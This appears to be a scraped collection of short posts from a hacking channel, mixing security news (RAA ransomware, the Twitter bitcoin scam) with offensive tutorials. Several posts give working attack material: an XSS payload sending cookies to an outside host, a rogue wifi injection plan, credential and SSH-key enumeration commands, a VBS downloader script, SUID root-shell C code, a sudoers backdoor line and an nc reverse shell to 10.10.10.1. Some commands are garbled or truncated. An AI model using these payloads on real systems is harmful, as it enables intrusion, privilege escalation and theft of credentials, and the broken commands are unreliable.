▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A ransomware program called RAA has recently appeared, written entirely in JavaScript, which can lock users' files by using a strong encryption program.

H O W I T W O R K ' S ?

> Most malware in Windows is written in a compiled language such as C or C++, and is distributed in the form of executable files such as .exe or .dll. Other malware is written using command-line scripts, such as Windows batch and PowerShell.

> The malware on the client side is rarely written in web-related languages, such as JavaScript, which is mainly interpreted by the browser. But the built-in Script Host of Windows can also directly execute .js files.

> Attackers have only recently started using this technology. Last month, Microsoft warned that js attachments in malicious emails may carry viruses, and ESET’s Security Research Institute also warned that certain js attachments may walk the Locky virus. But in both cases, JavaScript files are used as a downloader of malware. They download from other addresses and install traditional malware written in other languages ​​by default. But RAA is different, this is malware written entirely in JavaScript.

> Experts at the BleepingComputer.com technical support forum said that RAA relies on CryptoJS, a secure JavaScript library, to implement its encryption process. The implementation of encryption is very solid, using the AES-256 encryption algorithm.

> Once the file is encrypted, RAA will add .locked to the suffix of the original file name. Its encryption targets include: .doc, .xls, .rtf, .pdf, .dbf, .jpg, .dwg, .cdr, .psd, .cd, .mdb, .png, .lcd, .zip, .rar And .csv.

> Lawrence Abrams, the founder of BleepingComputer.com, said in a blog post: "Under the current circumstances, there is no way to decrypt except payment.

> According to the user's response, after being infected with RAA, messages in Russian will be randomly displayed, but even if it targets Russian computers, its proliferation is only a matter of time.

> It's not normal to include JavaScript attachments in emails, so users are advised to avoid opening such files, even if they are included in .zip compressed files. .js files are rarely used anywhere except in websites and browsers.

WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Reflected XSS-ALL YOU NEED TO KNOW :

The reflection-based XSS attack mainly relies on the script returned by the server of the site, which triggers execution on the client to launch a web attack.

example:

1) Make a hypothesis, when Amazon is searching for books, the submitted name is displayed when no books are found.

2) Search for content in the search box, fill in "<script>alert('handsome boy')</script>", and click search.

3) The current page does not filter the returned data and displays it directly on the page, and then the alert string will come out.

4) Then you can construct the address to obtain the user's cookies, and let others click on this address through QQ group or spam:

> http://www.amazon.cn/search?name=<script>document.location='http://xxx/get?cookie='+document.cookie</script>
S: Of course, this address is invalid, it's just an example.

🦑in conclusion:

If you only succeed in steps 1, 2, and 3, you are just tossing yourself. If you succeed in step 4, it is a decent XSS attack.

Develop safety measures:

1) When the front end displays the server data, not only the label content needs to be filtered and escaped, but even the attribute value may also be needed.

2) When the backend receives the request, it verifies whether the request is an attack request, and the attack is blocked.

E.g:

label:

<span><script>alert('handsome boy')</script></span>
Escape

<span>&lt;script&gt;alert(&#39;handsome boy&#39;)&lt;/script&gt</span>

> Attributes:

3) If the value attribute of an input is

> onclick="javascript:alert('handsome boy')
May appear


<input type="text" value="..." onclick="javascript:alert('handsome boy')">

4) Clicking on input causes the attack script to be executed. The solution can be to filter the script or double quotes.

WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑DOM-based or local XSS-tutorial

Based on DOM or local XSS attacks. Generally, a free wifi is provided, but a gateway that provides free wifi will insert a script into any page you visit or directly return a phishing page, thereby implanting malicious scripts. This kind of direct existence on the page without returning through the server is a local XSS attack.

Example 1:

1. Provide a free wifi.

1. Start a special DNS service, resolve all domain names to our computer, and set the Wifi DHCP-DNS to our computer IP.

2. After the user connected to wifi opens any website, the request will be intercepted by us. We forward to the real server according to the host field in the http header.

3. After receiving the data returned by the server, we can inject the web script and return it to the user.

4. When the injected script is executed, the user's browser will preload the common script libraries of major websites in turn.

WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑User & Privilege Information linux :

Command Result

whoami Current username

id Current user information

cat /etc/sudoers Who’s allowed to do what as root – Privileged command

sudo -l Can the current user perform anything as root

sudo -l 2>/dev/null | grep -w 'nmap|

perl|'awk'|'find'|'bash'|'sh'|'man'

|'more'|'less'|'vi'|'vim'|'nc'|'netcat'|python

|ruby|lua|irb' | xargs -r ls -la 2>/dev/null
Can the current user run any ‘interesting’ binaries as root and if so also display the binary permissions etc.

Enjoy ❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Interesting linux Files:

Command Result

find / -perm -4000 -type f 2>/dev/null Find SUID files

find / -uid 0 -perm -4000 -type f 2>/dev/null Find SUID

files owned by root

find / -perm -2000 -type f 2>/dev/null Find GUID files

find / -perm -2 -type f 2>/dev/null Find world-writeable files

find / ! -path "/proc/" -perm -2 -type f -print 2>/dev/null
Find world-writeable files excluding those in /proc

find / -perm -2 -type d 2>/dev/null Find word-writeable directories

find /home –name .rhosts -print 2>/dev/null Find rhost config files

find /home -iname .plan -exec ls -la {} ; -exec cat {} 2>/dev/null ;

Find .plan files, list permissions and cat the file contents

find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null ; -exec cat {} 2>/dev/null ; Find hosts.equiv, list permissions and cat the file contents

ls -ahlR /root/ See if you can access other user directories to find interesting files

cat ~/.bash_history Show the current users’ command history

ls -la ~/.history Show the current users’ various history files

ls -la /root/.*history Can we read root’s history files

ls -la ~/.ssh/ Check for interesting ssh files in the current users’ directory

find / -name "iddsa*" -o -name "idrsa" -o -name "known_hosts"

-o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -la Find SSH keys/host information

ls -la /usr/sbin/in. Check Configuration of inetd services

grep -l -i pass /var/log/.log 2>/dev/null Check log files for keywords (‘pass’ in this example) and show positive matches

find /var/log -type f -exec ls -la {} ; 2>/dev/null List files in specified directory (/var/log)

find /var/log -name .log -type f -exec ls -la {} ; 2>/dev/null

List .log files in specified directory (/var/log)


Enjoy ❤️👍🏻
✅github topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

malicious.link post snagging-creds-from-locked-machine #requested

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Linux commands for Service Information:

  Result

ps aux | grep root  View services running as root

ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'  Lookup process binary path and permissions

cat /etc/inetd.conf  List services managed by inetd

cat /etc/xinetd.conf  As above for xinetd

cat /etc/xinetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 
2>/dev/null  A very ‘rough’ command to extract associated 
binaries from xinetd.conf and show permissions of each

ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null  Permissions and contents of /etc/exports (NFS)

🦑Jobs/Tasks:

Command  Result

crontab -l -u %username%  Display scheduled jobs for the specified user – Privileged command

ls -la /etc/cron*  Scheduled jobs overview (hourly, daily, monthly etc)

ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null  What can ‘others’ write in /etc/cron* directories
 

Enjoy ❤️👍🏻

✅github topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How manage ftp on kali Linux ?

1️⃣apt-get update && apt-get install pure-ftpd

2️⃣go to #!/bin/bash

3️⃣groupadd ftpgroup

4️⃣useradd -g ftpgroup -d /dev/null -s /etc ftpuser

5️⃣pure-pw useradd offsec -u ftpuser -d /ftphome

6️⃣pure-pw mkdb

7️⃣cd /etc/pure-ftpd/auth/

8️⃣ln -s ../conf/PureDB 60pdb

9️⃣mkdir -p /ftphome

🔟chown -R ftpuser:ftpgroup /ftphome/

1️⃣1️⃣/etc/init.d/pure-ftpd restart

Enjoy ❤️👍🏻
✅github topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 File Transfers

- Post exploitation refers to the actions performed by an attacker,
once some level of control has been gained on his target.

- Simple Local Web Servers

- Run a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80

- Run a basic Python3 http server, great for serving up shells
etc
python3 -m http.server

- Run a ruby webrick basic http server
ruby -rwebrick -e "WEBrick::HTTPServer.new
(:Port => 80, :DocumentRoot => Dir.pwd).start"

- Run a basic PHP http server
php -S $ip:80

- Creating a wget VB Script on Windows:
*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*

- Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line):

> echo Set args = Wscript.Arguments >> webdl.vbs
timeout 1

> echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
timeout 1

> echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")

Enjoy ❤️👍🏻
✅github topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Linux commands for install programs :

Command Result

dpkg -l Installed packages (Debian)

rpm -qa Installed packages (Red Hat)

sudo -V Sudo version – does an exploit exist?

httpd -v Apache version

apache2 -v As above

apache2ctl (or apachectl) -M List loaded Apache
modules

mysql --version Installed MYSQL version details

psql -V Installed Postgres version details

perl -v Installed Perl version details

java -version Installed Java version details

python --version Installed Python version details

ruby -v Installed Ruby version details

find / -name %programname% 2>/dev/null (i.e. nc, netcat, wget,

nmap etc) Locate ‘useful’ programs (netcat, wget etc)

which %programname% (i.e. nc, netcat, wget, nmap etc) As above

dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc' 2>/dev/null| grep gcc 2>/dev/null List available compilers

cat /etc/apache2/envvars 2>/dev/null |grep -i 'user|group' |awk '{sub(/.export /,"")}1' Which account is Apache running as

Enjoy ❤️👍🏻
✅github topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The initial stage of information collection is scanning.

What is investigation?
Reconnaissance is to collect as much information as possible on the target network. From a hacker's point of view, information collection is very helpful for attacks. Generally speaking, the following information can be collected:

Email, port number, operating system, running service, Traceroute or DNS information, firewall identification and escape, etc.

1️⃣Introduction to NMAP
Nmap is a network connection end scanning software, used to scan the open network connection end of the computer on the Internet. Determine which services are running on which connections, and infer which operating system the computer is running (this is also known as fingerprinting). It is one of the necessary software for network administrators and is used to evaluate network system security.

> NMAP script engine
The NMAP script engine is the most powerful and flexible feature of NMAP. It allows users to write simple scripts to automate various network tasks, basically these scripts are written in lua language. Usually NMAP's script engine can do many things, such as:

2️⃣Network discovery
This is the basic function of NMAP. Examples include finding the whois information of the target domain name, querying the ownership of the target ip on ARIN, RIPE, or APNIC, finding open ports, SNMP query and listing available NFS/SMB/RPC shares and services .

3️⃣Vulnerability detection
When a new vulnerability is discovered, you want to quickly scan the network to identify vulnerable systems before intruders. Although NMAP is not a comprehensive vulnerability scanner, NSE is powerful enough to handle demanding vulnerability checks. Many vulnerable scripts are already available, and more scripts are planned.

4️⃣Backdoor detection
Many attackers and some automated worms will leave back doors so that they can be re-entered later. Some of them can be detected by NMAP based on regular expressions.

5️⃣Exploit
As a scripting language, NSE can even exploit vulnerabilities, not just find them. The ability to add custom attack scripts may be valuable to some people (especially penetration testers), but it is not intended to develop NMAP into something like the metasploit framework.

Enjoy ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑Local Privilege Escalation #Exploit in Linux

SUID (Set owner User ID up on execution)
Often SUID C binary files are required to spawn a shell as a
superuser, you can update the UID / GID and shell as required.\

1) SUID C Shell for /bin/bash

int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}

2) SUID C Shell for /bin/sh

int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}

3) Building the SUID Shell binary
gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c

4) Create and compile an SUID from a limited shell (no file transfer)

echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" >privsc.c
gcc privsc.c -o privsc

5) Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement:

> echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

6) You may find a command is being executed by the root user, you may be able to modify the system PATH environment variable
to execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on
port 4444.
set PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh
chmod +x ssh

Enjoy ❤️👍🏻
✅git 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Vulnerability solution

SQL injection vulnerability solutions:

1. The key to solving SQL injection vulnerabilities is to strictly check all data input from users and use the principle of least privilege for database configuration

2. All query statements use the parameterized query interface provided by the database, and the parameterized statements use parameters instead of embedding user input variables into the SQL statement.

 The special characters ('"\<>&*; etc.) entering the database are escaped or coded.

4. Confirm the type of each data. For example, numeric data must be numeric, and the storage field in the database must correspond to int type.

5. The data length should be strictly regulated, which can prevent the relatively long SQL injection statement from being executed correctly to a certain extent.

6. The encoding of each data layer of the website is unified. It is recommended to use UTF-8 encoding. Inconsistent upper and lower encoding may cause some filtering models to be bypassed.

7. Strictly restrict the operation authority of the website user's database, and provide this user with authority that can only satisfy his work, thereby minimizing the harm of injection attacks to the database.

8. Avoid websites displaying SQL error messages, such as type errors, field mismatches, etc., to prevent attackers from using these error messages to make some judgments.

9. Before the website is released, it is recommended to use some professional SQL injection detection tools to detect and patch these SQL injection vulnerabilities in time

WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

another reverse written tutorials

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Coinbase said it prevented more than 1,100 customers from trading with Twitter hackers
#news

> According to foreign media reports, cryptocurrency trading company Coinbase said that it recently prevented more than 1,100 customers from sending bitcoin to Twitter hackers. Last week, these hackers hijacked some well-known accounts to promote a Bitcoin scam. Philip Martin, Coinbase's chief information security officer, told Forbes that if Coinbase does not take this measure, these customers will send a total of 30.4 bitcoins (currently worth about $278,000) to hackers.

> It is worth noting that this amount is more than twice the actual amount ($121,000) collected by the hacker through the victim.

> Martin stated that despite Coinbase’s actions, 14 of its customers were still victims of the scam, and they sent hackers about $3,000 worth of Bitcoin before their addresses were blacklisted.

> The report shows that users of Gemini, Kraken and Binance have also tried to send bitcoin to these addresses, but the amount is not as large as Coinbase. All these exchanges acted immediately after the scam was exposed and blocked these addresses.

> It is reported that this widespread attack took place on Twitter on Wednesday local time in the United States. The celebrities affected include former US President Barack Obama, Microsoft co-founder Bill Gates and Tesla CEO Elon Musk. Wait.

> The blockchain analysis company claims that some stolen bitcoins have been transferred to some exchanges and mixed bitcoin merchants such as Wasabi Wallet.

> Tom Robinson, co-founder and chief scientist of Elliptic, told The Block: “We can see a very small amount of data flowing to a known, regulated encrypted exchange system.” However, for confidentiality reasons, he refused to disclose the name of the exchange. But Robinson further stated that 2.89 bitcoin (22% of the total amount) was sent to the mustard wallet.

> Another blockchain analysis company, Whitestream, told The Block that the address of one of the hackers had already conducted transactions with at least three cryptocurrency platforms. Itsik Levy, Co-founder and CEO of Whitestream, told The Block: "We can see that an address is connected to addresses related to several digital currency payment processors (CoinPayments, Coinbase, BitPay)."

> In fact, a BitPay spokesperson confirmed to The Block that in May 2020, one of its merchants remitted $25 from a Twitter hacker’s address, and as part of BitPay’s standard processes and procedures, they are remittances. The detailed information obtained risks to related parties including law enforcement agencies.

CoinPayments declined to comment on this matter, and Coinbase did not respond to a request for comment.

WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁